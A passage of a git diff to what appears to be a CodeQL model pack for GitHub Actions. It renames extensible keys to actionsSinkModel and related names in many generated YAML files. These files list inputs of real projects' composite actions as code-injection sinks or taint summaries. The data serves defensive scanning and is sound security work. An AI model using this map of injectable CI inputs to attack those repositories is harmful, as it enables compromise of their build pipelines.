@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631d..7203bb8345c6 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df4990..dcfbb0ea2032 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4a..6c5d6edd572c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d304576..fdaee61066ed 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee4798..d68c4e57c8ad 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9b..85a8d2f4d65d 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea4..d22754092787 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680bc..4dc0b87214b3 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769af..ea1a8a8afecb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc7..5ce00c29e52b 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa618..d1f551b66da3 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e338..6f8845ec1c0a 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272c..152fdfed4477 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bdc..5919ade7e819 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed9..d9afa5bb21fe 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf9..0b36853a8914 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea330..2bd521d42f58 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921efe..8ae81e706a42 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5e..4893772b71ae 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b7..e174c830a855 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950c..14070215bfa3 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056af..f3a0b47f2c2c 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa20..12011d643963 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0a..40ecb17610eb 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb24..250606588f98 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0ed..f2f5678b8b8a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e513359..b17eb01f8217 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca211961948..7ebdde766f3d 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6f..7f2e1588139e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff1441..eedeb3844223 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f455..fb6fb0267bb9 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a70964..60df7484e7f3 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe5..d0af7b61f989 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8c..8d08848d24c4 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c6..f26f672a586c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792b..5431aad8dca6 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68ccf..92c23f9f1fbd 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c50..52654194d81e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023c..43c274aa0337 100644 
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c94..7f8b87fa20ef 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306f..31422a708c5a 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a0..30ccfdea6318 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f5..9bc22ac93ef0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea9065..4ec47cb39750 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd2..81d137ce5478 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd5..79675d59c056 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc40..3310a67347cd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6cf..d12963b43db2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710b..1c63a9e6d0f7 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml 